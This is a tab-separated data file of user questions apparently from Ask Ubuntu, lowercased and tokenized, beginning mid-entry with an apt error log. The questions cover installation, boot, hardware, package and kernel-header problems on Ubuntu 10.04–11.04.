natty-updates/main sources ok http : //de.archive.ubuntu.com natty-updates/restricted sources ok http : //de.archive.ubuntu.com natty-updates/universe sources ok http : //de.archive.ubuntu.com natty-updates/multiverse sources ok http : //de.archive.ubuntu.com natty-updates/main i386 packages ok http : //de.archive.ubuntu.com natty-updates/restricted i386 packages ok http : //de.archive.ubuntu.com natty-updates/universe i386 packages ign http : //archive.canonical.com natty/partner translation-de_de ok http : //de.archive.ubuntu.com natty-updates/multiverse i386 packages ign http : //extras.ubuntu.com natty/main translation-de_de ign http : //de.archive.ubuntu.com natty-updates/main translationindex ign http : //archive.canonical.com natty/partner translation-de ign http : //de.archive.ubuntu.com natty-updates/multiverse translationindex ign http : //de.archive.ubuntu.com natty-updates/restricted translationindex ign http : //de.archive.ubuntu.com natty-updates/universe translationindex ign http : //extras.ubuntu.com natty/main translation-de ok http : //de.archive.ubuntu.com natty/main translation-de ign http : //archive.canonical.com natty/partner translation-en ign http : //extras.ubuntu.com natty/main translation-en hole:3 http : //de.archive.ubuntu.com natty-security/main sources [ 5.941 b ] hole:4 http : //de.archive.ubuntu.com natty-security/restricted sources [ 14 b ] hole:5 http : //de.archive.ubuntu.com natty-security/universe sources [ 2.145 b ] hole:6 http : //de.archive.ubuntu.com natty-security/multiverse sources [ 14 b ] ign http : //security.ubuntu.com natty-security/main translation-de_de ign http : //security.ubuntu.com natty-security/main translation-de ok http : //de.archive.ubuntu.com natty/multiverse translation-de ok http : //de.archive.ubuntu.com natty/restricted translation-de ign http : //security.ubuntu.com natty-security/main translation-en ign http : //security.ubuntu.com natty-security/multiverse translation-de_de ign http : //security.ubuntu.com natty-security/multiverse translation-de ign http : //security.ubuntu.com natty-security/multiverse translation-en ign http : //security.ubuntu.com natty-security/restricted translation-de_de ign http : //security.ubuntu.com natty-security/restricted translation-de ok http : //de.archive.ubuntu.com natty/universe translation-de ign http : //security.ubuntu.com natty-security/restricted translation-en ign http : //security.ubuntu.com natty-security/universe translation-de_de ign http : //security.ubuntu.com natty-security/universe translation-de ign http : //security.ubuntu.com natty-security/universe translation-en ign http : //de.archive.ubuntu.com natty/main translation-de_de ign http : //de.archive.ubuntu.com natty/main translation-en ign http : //de.archive.ubuntu.com natty/multiverse translation-de_de ign http : //de.archive.ubuntu.com natty/multiverse translation-en ign http : //de.archive.ubuntu.com natty/restricted translation-de_de ign http : //de.archive.ubuntu.com natty/restricted translation-en ign http : //de.archive.ubuntu.com natty/universe translation-de_de ign http : //de.archive.ubuntu.com natty/universe translation-en ign http : //de.archive.ubuntu.com natty-updates/main translation-de_de ign http : //de.archive.ubuntu.com natty-updates/main translation-de ign http : //de.archive.ubuntu.com natty-updates/main translation-en ign http : //de.archive.ubuntu.com natty-updates/multiverse translation-de_de ign http : //de.archive.ubuntu.com natty-updates/multiverse translation-de ign http : //de.archive.ubuntu.com natty-updates/multiverse translation-en ign http : //de.archive.ubuntu.com natty-updates/restricted translation-de_de ign http : //de.archive.ubuntu.com natty-updates/restricted translation-de ign http : //de.archive.ubuntu.com natty-updates/restricted translation-en ign http : //de.archive.ubuntu.com natty-updates/universe translation-de_de ign http : //de.archive.ubuntu.com natty-updates/universe translation-de ign http : //de.archive.ubuntu.com natty-updates/universe translation-en es wurden 31,5 kb in 4 s geholt ( 7.340 b/s ) paketlisten werden gelesen ... fehler ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/de.archive.ubuntu.com_ubuntu_dists_natty_main_binary-i386_packages e : die paketliste oder die statusdatei konnte nicht eingelesen oder geรถffnet werden . package list are read ... error ! e : encountered ... e : the package file or the status file could not be read or opened how can i fix that ?
43002	loads wrong resolution when installing	i 'm trying to install ubuntu 11.04 from a usb . my computer does load the usb file and i get some sort of bios-like screen where i can choose between 'install from usb ' and 'boot-up from usb ' . when i entered the corresponding number my screen resolution is totally messed up . i see that ubuntu is starting up when i used boot from usb , but the screen looks the same as you 'd have a too high screen resolution . same story with install from usb . i can see the screens loading and the menu 's and stuff , but not clearly because it load in a too high screen resolution . i 'm trying to dual-boot is with windows xp and max . screen resolution is 800x600 .
43011	display xchat icon in message menu	i’m pretty sure this is possible since i had it that way before my fresh install . now installed xchat and it’s icon is shown on the panel . how can i move it to the message menu ?
43013	thinkpad trackpoint buttons not working well	the trackpoint itself works fine . but the three buttons below the spacebar do n't . for example if i were to copy these lines , 1-10 , using trackpoint buttons it 'd start highlighting at 7 . if i use the main trackpad ( the part every laptop ) and it 's buttons it works normal , 1-10 : 1 2 3 4 5 6 7 8 9 10 it 's like the button does n't register right away . i use the trackpoint all the time . i love it and i do n't think i can go back to the normal trackpad , so is there anyway to fix this ? an app or setting ? also , the middle button to scroll is n't working at all i tried : middle button on thinkpad not working with 10.10 update and put it in /usr/share/ ... and /usr/lib ... neither seem to work . they used to work . i used to be able to use that method of fixing it , but it seems in 11.04 this doesnt work ? i dont wan na give up on ubuntu yet ...
43016	kubuntu hangs on shutdown	moved out of unity and installed kubuntu and so got back familiar desktop , etc but on shut down it starts and then hangs . i had this problem with unity , as well . no problem with earlier version and than upgraded to unity . please advise .
43017	windows boot manager : make ubuntu the default instead of windows	when i boot my computer , i get the windows boot manager with vista selected and ubuntu as the other item in the list . if i choose ubuntu , i get the grub menu . i have updated grub menus before so i know how that works , but since windows boot manager comes first , i do n't know how to change the default . i looked at this question : how do i make windows 7 the default os instead of ubuntu ? but it seems that that uses grub , but the default i want to change is before grub even comes up . any ideas ?
43019	how can i disable workspaces for external monitor ?	how can i disable workspaces for the external monitor in maverick meerkat ( 10.10 ) ? basically , i want to use the ability to switch workspaces , but on the main monitor only , i would like to set a fix window ( for example a media player ) on the external monitor . is this possible ? if i can not do that , is it possible to `` pin '' windows so they are visible on all workspaces ?
43020	decrease grub timeout	the grub timeout is 8 seconds . can this be turned down to 2 or 3 seconds ? what is the best way to do this ?
43021	is aes-ni fully supported ?	has support for the intel aes-ni hardware crypto acceleration been added to ubuntu ( luks , kernel , openssl libs , etc ) ? if so , starting with which version ? here is a list of intel processors supporting aes-ni : http : //ark.intel.com/mysearch.aspx ? aestech=true more about aes-ni : http : //software.intel.com/en-us/articles/intel-advanced-encryption-standard-instructions-aes-ni/ http : //en.wikipedia.org/wiki/aes_instruction_set # software_supporting_aes_instruction_set http : //www.tomshardware.com/reviews/clarkdale-aes-ni-encryption,2538.html i am mostly interested in finding out if this effectively suppresses / diminishes any performance penalties of using full disk encryption in ubuntu .
43027	loading dropbox on start-up when my dropbox folder is on separate partition	my dropbox folder is on another partition on my harddrive and dropbox loads on start up . but since the separate partition has't been opened yet , dropbox complains that my dropbox folder is missing . so ihave to close dropbox , make sure my separate partition is mounted , then load dropbox again . is there a way to auto-mount my drive before dropbox loads on startup ?
43029	ubuntu on windows without internet	i tried to use wubi , but there is no option to choose the iso image or anything like that . it requires an internet connection . how should i install ubuntu without internet ?
43032	is this cpu usage normal for xorg ?	i checked system monitor to see if the frequency of my cpu increases without doing anything and saw that xorg is always using 10-40 % of the cpu even if it 's not doing much of anything on the desktop or simply surfing the internet . is this normal ? if not , how can i fix it ? i have : a macbook white 4,1 core2 duo running at 2.10 ghz gpu intel gma x3100 4gb of ram ubuntu 11.04 i am running unity and i do not have many effects enabled . i have only activated compiz animations , scale , desktop , some shadows ...
43036	how do i install grub on a raid system installation ?	i 'm trying to setup and install ubuntu on a raid 1 setup . i have two disks , sdb and sdc . i 've been following this guide https : //help.ubuntu.com/community/installation/softwareraid which more or less works for getting everything set up and ubuntu installed . the problem is at the end of the installation , it tries to install grub . by default it tries my `` first disk '' , which gives a `` fatal error '' . i 've tried installing it on a specific partion , e.g . sdb1 as well as raid devices , e.g . md0 , md1 , etc.. nothing seems to work . the actual error is unable to install grub in /dev/sdb executing 'grub-install '/dev/sdb ' failed . this is a fatal error . then i 'm taken back to the main install menu . if i choose `` install the grub boot loader on a hard disk '' option , i can pick the partition , but entering sdb2 or md1 gives the same error . so i went ahead an just did n't install grub , which means now i presumably have a working ubuntu installation , but i ca n't boot it . i 've tried booting from the livecd to install grub , but i ca n't chroot into my system because it does n't seem to recognize that my disk is a linux disk . there 's an error about it being a raid partition . so basically i would really like to know how you know to which device to install grub at installation , or at the very least , how to install it on to my system now . i suppose i should also mention that sda is a windows 7 installation that i would like to keep around and be able to access at boot . thanks for any help .
43044	position of window control buttons	can we have unity move the max/min/close buttons to the right ? when the window is not maximized , metacity takes control of the window , therefore we can use gconf-editor to force the traditional min/max/close right style buttons . however , when compiz takes control ( maximized ) , it 's back to ubuntu style . any way to make compiz obey gconf-editor or an option in the unity plugin ?
43045	xubuntu 11.04 does n't boot with a splash screen/image	i have recently installed xubuntu 11.04 and when it boots up there is no splash image . i have looked all over the internet trying to installed splash images and looking the matter up but had no help what so ever . iv even chose the splash image via settings manager ; session and startup ; splash but nothings changed when i reboot . theres just a black screen with a flashing underscore thank you to anyone that can help
43048	how can i specify a more appropriate font substitution ?	a particular pdf i have uses a non-embedded font named `` timesnrmt '' that is not installed on my system . instead of substituting the font with a similar one such as times new roman , document viewer is inappropriately choosing to use some sans-serif font , which makes the text nearly unreadable : how can i override this choice of font substitution ?
43049	set fn + arrow to represent 'home ' and 'end '	i 'd like to add set a functionality to the pair fn+right/left to be like in mac - 'home ' and 'end ' . i do n't mean to replace the 'home ' and 'end ' buttons - just adding another 'home'/'end ' keys . the advantage is in writing/modifying text . i use the arrows a lot , and i also use the home and end buttons , but why jump to a whole new button ? my left hand is already near the fn ( function ) key - ready to press control or shift . how do i set this ? thanks .
43050	uninstalling flash plugin completely	i 've made the mistake of installing firefox flash plugin , which is horribly buggy , unstable and leaky . i need to banish this piece of rubbish out of my precious ubuntu workstation . i tried this by doing sudo apt-get remove flashplugin-installer but that just removes the installer , not the library what package do i need to remove to completely uninstall this ?
43053	can i restore paid apps from the software center after a os reinstall ?	hi all , i am considering buying an app or two from the software center , but i have a few questions before i jump in . the main issue is that i tend to reinstall ubuntu after each major release , rather than dist-upgrade . if i were to buy an app now , and reinstall ubuntu in 6 months , can i import the app again without paying a second time ? alon gth
43057	problems with disappearing authentication window	when i try to use the software center , the authentication windows pops up and disappears after 1 second shaking sideways ( like when the password is incorrect ) even though i was not able to type anything . i can use synaptic and type my password , but if i try to change groups or user accounts the same issue happens : authentication window pops up for 1 second and disappears . any ideas on what can be wrong ? it was working good til today . this is the out put of /var/log/auth.log : may 15 20:46:46 laura-g31d-m9 polkitd ( authority=local ) : operator of unix-session : /org/freedesktop/consolekit/session13 failed to authenticate to gain authorization for action org.debian.apt.install-or-remove-packages for system-bus-name : :1.356 [ /usr/bin/python /usr/bin/software-center ] ( owned by unix-user : laura ) may 15 20:46:49 laura-g31d-m9 dbus-daemon : [ system ] rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.356 '' ( uid=1000 pid=17053 comm= '' /usr/bin/python ) interface= '' org.freedesktop.dbus.introspectable '' member= '' introspect '' error name= '' ( unset ) '' requested_reply=0 destination= '' :1.303 '' ( uid=0 pid=15565 comm= '' /usr/bin/python ) )
43058	is ubuntu one be able to store raw and avi files ?	is ubuntu one be able to store raw file and avi video format . i cant find an answer on this question on here . i have tried and none of my files were able to be copied
43065	how to submit commercial apps to the ubuntu software center ?	why is n't there a clear description for developers on selling an app on the ubuntu software center ? i was thinking of maybe tying it up to the ubuntu one account for integrating the app with cloud services .
43066	how to get dpkg working again ?	i tried to install sqlite3 on ubuntu 10.04 by typing : sudo apt-get install sqlite3 this gave me the message e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . so i tried the `` sudo dpkg -- configure -a '' , no error . i tried to install sqlite3 again . this time it showed what updates will be done . so i continued and received this error message ( partially translated from greman ) : unpacking substitution for ubuntu-docs ... dpkg : ../../src/archives.c:763 : tarobject : assertion âťr == stab.st_sizeâť not fullfilled e : sub-process /usr/bin/dpkg exited unexpectedly i hope that some experts in here can help me : )
43067	ubuntu upgrade to 11.04 from 10.10 no options	i have upgraded ubuntu netbook to 11.04 from 10.10 on my inspiron 1525. now the screen looks blank ( red ) once it startup . i can not access much . only saving thing is that evolution was my default client ( after upgrade it asked me whether you want to keep it as ur default mail client ) . so using the evolution mail client , evolution starts immediately after i start the computer . i can read my mails ( with ethernet connection , wireless does n't seem to work ) . i want to do my regular work like run eclipse etc , and now i ca not do much other than checking mails .
43068	secure remote access to machine ?	i have a local network of 80 machines , all with ubuntu 10.04 installed on them . all the machines are connected to a central switch . i have some contractors that are located overseas . i would like to dedicate each of them a single machine , so that all the work they do will be performed on one of my 'local ' machines ( through remote access ) . ideally , i 'd prefer a secure solution ( vpn ? ) that will allow each of the users to securely connect to a remote machine , view 'x ' ( meaning , be able to open programs like evolution , send emails , write documents using open office etc ) and also open a terminal , run scripts etc . ideally , the solution should be fast ( meaning , i do n't want a long delay between every punch on their keyboard to when their screen gets updated ) and secure . i should also have the ability to access the machine they 're working on and block their access , in case they 're doing something they 're not supposed to do . is it easy to handle / setup ? any idea what the costs are ?
43075	how to use kernel headers appropriately ?	i wrote a very simple kernel programming source code : # include < linux/kernel.h > # include < linux/fcntl.h > # include < linux/init.h > static int __init ( void ) { sys_open ( `` ee.c '' , o_rdonly ) ; but because kernel sources ( which is really executed now ) is on home folder , below errors occurred . even though i made symbolic links like that . rm -rf /usr/include/linux rm -rf /usr/include/asm ln -s /home/linux-2.6.21/include/linux /usr/include/linux ln -s /home/linux-2.6.21/include/asm-i386 /usr/include/asm in file included from /usr/include/asm/fcntl.h:1 , from /usr/include/linux/fcntl.h:4 , from v.c:2 : /usr/include/asm-generic/fcntl.h:120 : error : expected specifier-qualifier-list before ‘off_t’ /usr/include/asm-generic/fcntl.h:143 : error : expected specifier-qualifier-list before ‘loff_t’ what do i need to do before using kernel headers which is different folder with /usr/include and why this type errors occurred ? i made also rm -rf /usr/include/asm ln -s /home/linux-2.6.21/include/asm-i386 /usr/include/asm and # include < linux/syscall.h > i was stucked ... . that is full error message.. i think the kernel header files are particulary disinformationed.. in file included from /usr/include/linux/syscalls.h:61 , from vv.c:4 : /usr/include/linux/list.h:959:2 : warning : # warning `` do n't include kernel headers in userspace '' in file included from /usr/include/asm/siginfo.h:4 , from /usr/include/linux/syscalls.h:64 , from vv.c:4 : /usr/include/asm-generic/siginfo.h:75 : error : expected specifier-qualifier-list before ‘clock_t’ in file included from /usr/include/asm/signal.h:5 , from /usr/include/linux/syscalls.h:65 , from vv.c:4 : /usr/include/linux/time.h:12 : error : redefinition of ‘struct timespec’ /usr/include/linux/time.h:18 : error : redefinition of ‘struct timeval’ in file included from /usr/include/linux/syscalls.h:65 , from vv.c:4 : /usr/include/asm/signal.h:32 : error : conflicting types for ‘sigset_t’ /usr/include/sys/select.h:38 : error : previous declaration of ‘sigset_t’ was here in file included from /usr/include/linux/syscalls.h:66 , from vv.c:4 : /usr/include/linux/quota.h:47 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘dq_data_lock’ in file included from /usr/include/asm/processor.h:17 , from /usr/include/asm/atomic.h:5 , from /usr/include/linux/key.h:22 , from /usr/include/linux/syscalls.h:67 , from vv.c:4 : /usr/include/asm/msr.h:90 : error : expected declaration specifiers or ‘ ... ’ before ‘u32’ /usr/include/asm/msr.h:90 : error : expected declaration specifiers or ‘ ... ’ before ‘u32’ /usr/include/asm/msr.h:90 : error : expected declaration specifiers or ‘ ... ’ before ‘u32’ /usr/include/asm/msr.h : in function ‘rdmsr_on_cpu’ : /usr/include/asm/msr.h:92 : error : ‘l’ undeclared ( first use in this function ) /usr/include/asm/msr.h:92 : error : ( each undeclared identifier is reported only once /usr/include/asm/msr.h:92 : error : for each function it appears in . ) /usr/include/asm/msr.h:92 : error : ‘h’ undeclared ( first use in this function ) /usr/include/asm/msr.h:92 : error : ‘msr_no’ undeclared ( first use in this function ) /usr/include/asm/msr.h:92 : error : invalid lvalue in asm output 0 /usr/include/asm/msr.h:92 : error : invalid lvalue in asm output 1 /usr/include/asm/msr.h : at top level : /usr/include/asm/msr.h:94 : error : expected declaration specifiers or ‘ ... ’ before ‘u32’ /usr/include/asm/msr.h:94 : error : expected declaration specifiers or ‘ ... ’ before ‘u32’ /usr/include/asm/msr.h:94 : error : expected declaration specifiers or ‘ ... ’ before ‘u32’ /usr/include/asm/msr.h : in function ‘wrmsr_on_cpu’ : /usr/include/asm/msr.h:96 : error : ‘msr_no’ undeclared ( first use in this function ) /usr/include/asm/msr.h:96 : error : ‘l’ undeclared ( first use in this function ) /usr/include/asm/msr.h:96 : error : ‘h’ undeclared ( first use in this function ) in file included from /usr/include/asm/processor.h:18 , from /usr/include/asm/atomic.h:5 , from /usr/include/linux/key.h:22 , from /usr/include/linux/syscalls.h:67 , from vv.c:4 : /usr/include/asm/system.h : at top level : /usr/include/asm/system.h:346 : error : expected declaration specifiers or ‘ ... ’ before ‘u8’ /usr/include/asm/system.h:346 : error : expected declaration specifiers or ‘ ... ’ before ‘u8’ /usr/include/asm/system.h:347 : error : expected declaration specifiers or ‘ ... ’ before ‘u16’ /usr/include/asm/system.h:347 : error : expected declaration specifiers or ‘ ... ’ before ‘u16’ /usr/include/asm/system.h:348 : error : expected declaration specifiers or ‘ ... ’ before ‘u32’ /usr/include/asm/system.h:348 : error : expected declaration specifiers or ‘ ... ’ before ‘u32’ /usr/include/asm/system.h : in function ‘cmpxchg_386’ : /usr/include/asm/system.h:355 : error : too many arguments to function ‘cmpxchg_386_u8’ /usr/include/asm/system.h:357 : error : too many arguments to function ‘cmpxchg_386_u16’ /usr/include/asm/system.h:359 : error : too many arguments to function ‘cmpxchg_386_u32’ in file included from /usr/include/linux/cpumask.h:86 , from /usr/include/asm/processor.h:22 , from /usr/include/asm/atomic.h:5 , from /usr/include/linux/key.h:22 , from /usr/include/linux/syscalls.h:67 , from vv.c:4 : /usr/include/linux/bitmap.h : in function ‘bitmap_zero’ : /usr/include/linux/bitmap.h:134 : error : ‘bits_per_long’ undeclared ( first use in this function ) /usr/include/linux/bitmap.h : in function ‘bitmap_fill’ : /usr/include/linux/bitmap.h:149 : error : ‘bits_per_long’ undeclared ( first use in this function ) /usr/include/linux/bitmap.h : in function ‘bitmap_copy’ : /usr/include/linux/bitmap.h:155 : error : ‘bits_per_long’ undeclared ( first use in this function ) /usr/include/linux/bitmap.h : in function ‘bitmap_and’ : /usr/include/linux/bitmap.h:166 : error : ‘bits_per_long’ undeclared ( first use in this function ) /usr/include/linux/bitmap.h : in function ‘bitmap_or’ : /usr/include/linux/bitmap.h:175 : error : ‘bits_per_long’ undeclared ( first use in this function ) /usr/include/linux/bitmap.h : in function ‘bitmap_xor’ : /usr/include/linux/bitmap.h:184 : error : ‘bits_per_long’ undeclared ( first use in this function ) /usr/include/linux/bitmap.h : in function ‘bitmap_andnot’ : /usr/include/linux/bitmap.h:193 : error : ‘bits_per_long’ undeclared ( first use in this function ) /usr/include/linux/bitmap.h : in function ‘bitmap_complement’ : /usr/include/linux/bitmap.h:202 : error : ‘bits_per_long’ undeclared ( first use in this function ) /usr/include/linux/bitmap.h : in function ‘bitmap_equal’ : /usr/include/linux/bitmap.h:211 : error : ‘bits_per_long’ undeclared ( first use in this function ) /usr/include/linux/bitmap.h : in function ‘bitmap_intersects’ : /usr/include/linux/bitmap.h:220 : error : ‘bits_per_long’ undeclared ( first use in this function ) /usr/include/linux/bitmap.h : in function ‘bitmap_subset’ : /usr/include/linux/bitmap.h:229 : error : ‘bits_per_long’ undeclared ( first use in this function ) /usr/include/linux/bitmap.h : in function ‘bitmap_empty’ : /usr/include/linux/bitmap.h:237 : error : ‘bits_per_long’ undeclared ( first use in this function ) /usr/include/linux/bitmap.h : in function ‘bitmap_full’ : /usr/include/linux/bitmap.h:245 : error : ‘bits_per_long’ undeclared ( first use in this function ) /usr/include/linux/bitmap.h : in function ‘bitmap_weight’ : /usr/include/linux/bitmap.h:253 : error : ‘bits_per_long’ undeclared ( first use in this function ) /usr/include/linux/bitmap.h : in function ‘bitmap_shift_right’ : /usr/include/linux/bitmap.h:261 : error : ‘bits_per_long’ undeclared ( first use in this function ) /usr/include/linux/bitmap.h : in function ‘bitmap_shift_left’ : /usr/include/linux/bitmap.h:270 : error : ‘bits_per_long’ undeclared ( first use in this function ) in file included from /usr/include/asm/processor.h:22 , from /usr/include/asm/atomic.h:5 , from /usr/include/linux/key.h:22 , from /usr/include/linux/syscalls.h:67 , from vv.c:4 : /usr/include/linux/cpumask.h : at top level : /usr/include/linux/cpumask.h:88 : error : expected specifier-qualifier-list before ‘declare_bitmap’ /usr/include/linux/cpumask.h : in function ‘__cpu_set’ : /usr/include/linux/cpumask.h:94 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpu_clear’ : /usr/include/linux/cpumask.h:100 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpus_setall’ : /usr/include/linux/cpumask.h:106 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpus_clear’ : /usr/include/linux/cpumask.h:112 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpu_test_and_set’ : /usr/include/linux/cpumask.h:121 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpus_and’ : /usr/include/linux/cpumask.h:128 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:128 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:128 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpus_or’ : /usr/include/linux/cpumask.h:135 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:135 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:135 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpus_xor’ : /usr/include/linux/cpumask.h:142 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:142 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:142 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpus_andnot’ : /usr/include/linux/cpumask.h:150 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:150 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:150 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpus_complement’ : /usr/include/linux/cpumask.h:157 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:157 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpus_equal’ : /usr/include/linux/cpumask.h:164 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:164 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpus_intersects’ : /usr/include/linux/cpumask.h:171 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:171 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpus_subset’ : /usr/include/linux/cpumask.h:178 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:178 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpus_empty’ : /usr/include/linux/cpumask.h:184 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpus_full’ : /usr/include/linux/cpumask.h:190 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpus_weight’ : /usr/include/linux/cpumask.h:196 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpus_shift_right’ : /usr/include/linux/cpumask.h:204 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:204 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpus_shift_left’ : /usr/include/linux/cpumask.h:212 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:212 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpumask_scnprintf’ : /usr/include/linux/cpumask.h:273 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpumask_parse_user’ : /usr/include/linux/cpumask.h:281 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpulist_scnprintf’ : /usr/include/linux/cpumask.h:289 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpulist_parse’ : /usr/include/linux/cpumask.h:295 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpu_remap’ : /usr/include/linux/cpumask.h:303 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:303 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h : in function ‘__cpus_remap’ : /usr/include/linux/cpumask.h:311 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:311 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:311 : error : ‘cpumask_t’ has no member named ‘bits’ /usr/include/linux/cpumask.h:311 : error : ‘cpumask_t’ has no member named ‘bits’ in file included from /usr/include/asm/atomic.h:5 , from /usr/include/linux/key.h:22 , from /usr/include/linux/syscalls.h:67 , from vv.c:4 : /usr/include/asm/processor.h : at top level : /usr/include/asm/processor.h:82 : error : ‘config_x86_l1_cache_shift’ undeclared here ( not in a function ) /usr/include/asm/processor.h:82 : error : requested alignment is not a constant in file included from vv.c:4 : /usr/include/linux/syscalls.h:114 : error : expected ‘ ) ’ before ‘*’ token /usr/include/linux/syscalls.h:115 : error : expected declaration specifiers or ‘ ... ’ before ‘old_sigset_t’ /usr/include/linux/syscalls.h:116 : error : expected declaration specifiers or ‘ ... ’ before ‘old_sigset_t’ /usr/include/linux/syscalls.h:178 : error : expected ‘ ) ’ before ‘*’ token /usr/include/linux/syscalls.h:394 : error : expected ‘ ) ’ before ‘cookie64’ /usr/include/linux/syscalls.h:474 : error : expected ‘ ) ’ before ‘mqdes’ /usr/include/linux/syscalls.h:475 : error : expected ‘ ) ’ before ‘mqdes’ /usr/include/linux/syscalls.h:476 : error : expected ‘ ) ’ before ‘mqdes’ /usr/include/linux/syscalls.h:477 : error : expected ‘ ) ’ before ‘mqdes’ /usr/include/linux/syscalls.h:507 : error : expected declaration specifiers or ‘ ... ’ before ‘key_serial_t’ /usr/include/linux/syscalls.h:512 : error : expected declaration specifiers or ‘ ... ’ before ‘key_serial_t’ /usr/include/linux/syscalls.h:546 : error : expected declaration specifiers or ‘ ... ’ before ‘u32’ /usr/include/linux/syscalls.h:547 : error : expected declaration specifiers or ‘ ... ’ before ‘u32’ vv.c : in function ‘init’ : vv.c:7 : error : too few arguments to function ‘sys_open’
43077	how do i start developing a lens for unity ?	i would like to know how to create one of those lenses for unity . i know how to program . but i do n't know where to start . are there certain libraries i should use or docs that i should read ? are there wiki pages that i can reference ? my google-fu has so far failed me .
43079	how can i install the opengl libraries in ubuntu 11.04 ?	i need opengl for some processing programming , how can i install the opengl libraries in ubuntu 11.04 ? i have a sony vaio f series with nvidia drivers installed .
43082	is it possible to use lightdm in 11.04 ?	o we know 11.10 will use lightdm instead of gdm . my question is can i use it in 11.04 already or would that not be advisable ?
43083	how do i change the music player in the sound menu on xubuntu ?	i was wondering how i could change the music player in the sound menu . right now it 's gmusicbrowser but i would like to change it guayadeque music player
43085	how do i transfer videos from a kodak playsport video camera to my computer ?	i tried downloading a clip from my playsport video camera to my computer and could not get it to work . it was about a 15 second clip or so and it would click through about four frames . more like a snapshot slideshow . i want to be able to import video and make simple movies with them . something similar to windows movie maker ( which i have used before . )
43086	how to transfer files from/to an android device with adb via gui ?	do you know if there is an ubuntu program ( possibly a nautilus plugin ) to transfer files from/to an android device ? what is my mind is a program which does adb push , adb pull , and adb shell ls in the background and has a gui . note that adb allows for broader filesystem access than mtp and ums .
43088	how to install printer driver for hp deskjet 1000 j110 ?	one printer has hp dj 1000 j110 drivers installed and it works . the other printer is another story that requires a little advice . the main driver is hplip-3.11.3a.run . during its installation run ( sh hplip-3.11.3a.run ) , it cuts off with the following error message : error : configure failed with error : general / unknown error . why ? lucid repositories combed for hp and cups programs , , 'hp-setup ' , and hplip-3.11.3a.run but to no avail . printer and computer connected together `` localhost '' . i added the ppa andrea mentions but 'hp-setup ' says error : no devices found on bus : usb . computer/printer is connected to localhost and the document print status box says job is processing but there is no output . and i can not think of anything else to report at this point . your help will greatly be appreciated .
43092	resume interrupted copy	i 'm backing up an old hard drive and copying about 300gb of files . it had about 50gb left when i got a kernel panic and now i want to resume the copying . is there a way to do this in ubuntu ? ( a do n't copy if file already exists but copy all files that do n't already exist argument ? )
43093	is there something similar to the android appdrawer/app launcher ?	i 'm curious about this , i have n't seen something similar , the unity dash is something pretty close to that but it requires all of unity which i do n't like at all . then there 's slingshot from the elementaryos guys , but it 's not even released yet , so that it 's not currently an option . is there anything else , that does the same as the android appdrawer ?
43096	unity lenses missing ( files/folders , applications )	the file & folders lens and default applications lens is missing from my dock . how can i get them back ? i attempted the guide here : http : //www.webupd8.org/2011/04/how-to-reset-unity-launcher-icons-or.html all the icons came back except the two missing lenses . unity-place-applications and unity-place-files are both currently installed .
